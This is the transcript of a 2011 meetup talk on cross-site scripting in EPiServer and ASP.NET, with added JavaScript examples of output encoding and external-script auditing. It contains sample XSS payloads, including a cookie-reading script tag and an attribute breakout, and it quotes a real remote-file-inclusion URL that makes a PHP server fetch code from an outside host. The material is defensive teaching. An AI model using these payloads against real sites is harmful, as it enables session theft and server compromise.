XSS - Presented at EPiServer Meetup in Oslo 25th May 2011
Transcript

  • 1. XSS – Cross site scripting
    Oslo EPiServer Meetup #7 – 25th May 2011
    © Creuna
    Slide 1
  • 2. Definition
    Cross site scripting is a form of attack where the attacker is able to run arbitrary JavaScript code in a web page viewed by another user.
    XSS compromises the client side, not the server. The injected script runs with the origin of the vulnerable site, so it can do whatever that user's browser session can do on the site.
    Depending on the nature of the website it can therefore be a serious security risk.
  • 3. Consequences
    XSS may be used to:
    - Steal session cookies
    - Perform any action that the attacked user has rights to perform, possibly without the user knowing
    - Display false or modified content
    - Spread like a software worm, for instance on a social network site: a user posts the attacking code, which infects his friends, they post it in turn, and so on
  • 4. Two types of XSS
    Non-persistent (reflected):
    A user follows a malicious link or submits a form from a dangerous website, email, etc. The vulnerable website writes the XSS attack back into the response, and only this user is affected.
    Persistent (stored):
    The XSS attack code is stored on the vulnerable website, for instance in a user comment. All subsequent users of the website may be exposed to the XSS attack.
  • 5. Where does the XSS attack come from?
    All content from insecure sources is potentially dangerous:
    - Form submissions
    - URLs
    - All other sources: RSS feeds, integrated systems, etc.
  • 6. Form submissions
    Dangerous content may come through POST variables.
    Remember that POST requests do not necessarily originate from a form on a page you served the user; an attacker may craft a web page or request targeting your website.
    DEMO
    (The demo showed a simple ASP.NET form writing a submitted text back to the page on postback. By default, dangerous POST variables result in an exception in ASP.NET, so we are covered, right? The next demo showed the same principle in a minimally modified EPiServer demo site, and the XSS attack was successful. EPiServer turns off ASP.NET's input verification in its default configuration.)
  • 7. URL input
    Do you write the value of Request.Url back to your response?
    Yes, even ASP.NET itself does that (the action attribute of the rendered <form> element, for instance, contains the current request URL).
    DEMO
    (The demo showed using a URL with XSS in it against a standard ASP.NET website, and we got an exception like with the POST attack. EPiServer proved vulnerable again.)
  • 8. EPiServer
    ASP.NET's request validation normally rejects input that looks like markup, so the obvious XSS payloads never reach your code.
    But EPiServer turns this feature off by default. ASP.NET's switch for it is the validateRequest attribute (on the <pages> element in web.config, or on the @ Page directive), so check what your site's configuration sets.
    We must always give external input an extra thought in EPiServer: ASP.NET's normal safety net is turned off!
  • 9. How do we secure ourselves against XSS?
    Always make sure to escape data from unsecure sources if you are going to write it to the response, and encode it for the context you write it into (HTML body, HTML attribute, JavaScript, URL); one encoder does not fit every context.
    This also applies to URLs, like Request.Url.
    Do not trust your own ability to foresee all scenarios, so do not write the code for this yourself.
    Use a well-tested and reviewed framework.
    For instance Microsoft's AntiXSS: http://wpl.codeplex.com/
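The reflected pattern from slides 6 and 7 (a page that echoes a POST field and the request URL) next to the output encoding slide 9 recommends, as an added example that is not code from the slides or from EPiServer. It is plain Node.js with no server: the requests are constructed by hand, the page name Default.aspx is an assumption, and the request-validation check is a simplified approximation of ASP.NET's rule, not the real implementation. The third request shows why request validation is a safety net rather than a fix: an attribute-context payload contains no "<" at all, so it passes validation and only output encoding stops it.

```javascript
// Added example, not code from the slides: reflected XSS through a POST field
// and through the request URL, next to context-aware output encoding.
// Node.js, standard library only; requests below are constructed by hand.

// Encode for an HTML text node. Same characters that HttpUtility.HtmlEncode
// and the AntiXSS HtmlEncode cover at minimum.
function encodeForHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Encode for a double-quoted attribute value. Same replacements; the quote is
// the critical one, because it is what lets an attacker close the attribute.
function encodeForHtmlAttribute(s) {
  return encodeForHtml(s);
}

// Simplified model of ASP.NET request validation (assumption: approximates the
// .NET 4 rule, which rejects "<" followed by a letter, "!", "/" or "?", and "&#").
function requestValidationRejects(value) {
  return /<[A-Za-z!\/?]|&#/.test(value);
}

// The vulnerable pattern: raw request data written straight into the response.
function renderVulnerable(req) {
  return `<p>Hello ${req.form.name}</p>` +
    `<form action="${req.url}" method="post"></form>`;
}

// The fix: every untrusted value encoded for the context it is written into.
function renderSafe(req) {
  return `<p>Hello ${encodeForHtml(req.form.name)}</p>` +
    `<form action="${encodeForHtmlAttribute(req.url)}" method="post"></form>`;
}

// Does attacker-controlled markup survive in the output as live markup?
function injectedMarkupPresent(html) {
  return /<script>/.test(html) || / onmouseover="/.test(html);
}

// Constructed requests. The page name is an assumption.
const bodyPayload = {
  url: "/Default.aspx",
  form: { name: "<script>alert(document.cookie)</script>" },
};
const urlPayload = {
  url: "/Default.aspx?q=<script>alert(1)</script>",
  form: { name: "Bob" },
};
// Attribute-context payload: no "<" at all, so request validation passes it.
const attrPayload = {
  url: '/Default.aspx" onmouseover="alert(1)',
  form: { name: "Bob" },
};

// Run one request through the safety net and through both renderings.
function evaluate(req) {
  const rejected =
    requestValidationRejects(req.url) || requestValidationRejects(req.form.name);
  return {
    rejectedByRequestValidation: rejected,
    vulnerableLeaks: injectedMarkupPresent(renderVulnerable(req)),
    safeLeaks: injectedMarkupPresent(renderSafe(req)),
  };
}

for (const [label, req] of Object.entries({ bodyPayload, urlPayload, attrPayload })) {
  console.log(label, evaluate(req));
}
```

Run it with node. The first two requests are rejected by the validation model and would have been exploitable only because EPiServer switches validation off; the third is exploitable with validation on or off, and all three are harmless once the output is encoded.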
  • 10. Are you using PHP?
    As PHP is a script language, similar attacks may actually compromise the server side.
    Real world example from one of our projects:
    <form method="post" action="/no/?_SERVER%25255bDOCUMENT_ROOT%25255d=http://bungalowsdemo.info/images/test.gif" id="aspnetForm">
    This attack would make the server run the PHP code in test.gif, which is not a picture but PHP code. The parameter name is `_SERVER[DOCUMENT_ROOT]` with the brackets URL-encoded several times over; it relies on PHP's register_globals overwriting `$_SERVER['DOCUMENT_ROOT']`, so that an include built from that value fetches the attacker's file instead of a local one (a remote file inclusion, not XSS).
    The website bungalowsdemo.info has probably itself been compromised and is being used, unknowingly, to host the attack code.
  • 11. External script files
    Do you include external script files in your website?
    For instance, do you use Google's or Microsoft's CDN for JavaScript?
    Real world example, web statistics tool:
    <script src="http://res.xtractor.no/x.js" type="text/javascript"></script>
  • 12. External script files
    If you reference external script files, you give another domain/source the right to run JavaScript on your website.
    Of course you can trust Google's or Microsoft's CDN to deliver proper code.
    But a different domain may be vulnerable to DNS attacks.
    An attacker may manipulate DNS on the local machine or network to deliver external scripts from a different source.
    If all referenced script files are from the same domain as the viewed web page, you avoid this vulnerability: an attacker who can redirect your own domain already controls the whole page, so same-domain scripts add no new trust.
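The check slide 12 implies, as an added example that is not code from the slides: an audit of every `<script src>` in a page that reports references to a host other than the page's own. It also flags scripts loaded over plain http, which goes beyond the slide: such a script can be swapped by anyone on the network path, DNS trick or not. Node.js, no dependencies. The page HTML is constructed for the example and the site name www.example.com is an assumption; the res.xtractor.no reference is the one quoted on slide 11.

```javascript
// Added example, not code from the slides: audit <script src> references
// against the rule "only load scripts from the page's own domain", and flag
// plain-http script URLs as well. Node.js, standard library only.

const SCRIPT_SRC = /<script\b[^>]*\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;

// Extract every script src from an HTML document (quoted or unquoted).
function scriptSources(html) {
  const out = [];
  for (const m of html.matchAll(SCRIPT_SRC)) {
    out.push(m[1] ?? m[2] ?? m[3]);
  }
  return out;
}

// Classify one src relative to the page it is embedded in.
function classifyScript(src, pageUrl) {
  const page = new URL(pageUrl);
  // Relative and protocol-relative URLs resolve against the page URL.
  const target = new URL(src, pageUrl);
  const findings = [];
  if (target.host !== page.host) {
    findings.push("third-party host " + target.host);
  }
  if (target.protocol === "http:") {
    findings.push("loaded over plain http");
  }
  return { src, host: target.host, findings };
}

function auditScripts(html, pageUrl) {
  return scriptSources(html).map((src) => classifyScript(src, pageUrl));
}

// Only the references that need a decision from the site owner.
function flaggedScripts(html, pageUrl) {
  return auditScripts(html, pageUrl)
    .filter((r) => r.findings.length > 0)
    .map((r) => `${r.src}: ${r.findings.join(", ")}`);
}

// Constructed page. www.example.com is the assumed site; the second script is
// the statistics tool quoted on slide 11, the third a public CDN reference.
const PAGE_URL = "https://www.example.com/news/";
const PAGE_HTML = `
<html><head>
<script src="/scripts/site.js" type="text/javascript"></script>
<script src=http://res.xtractor.no/x.js type="text/javascript"></script>
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js"></script>
<script type='text/javascript' src='https://www.example.com/scripts/app.js'></script>
</head><body></body></html>`;

for (const line of flaggedScripts(PAGE_HTML, PAGE_URL)) {
  console.log(line);
}
```

Run it with node; it prints one line per flagged script. The same-domain references produce no findings, the CDN reference is reported as third-party, and the statistics script is reported both as third-party and as plain http.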
  • 13. Questions?
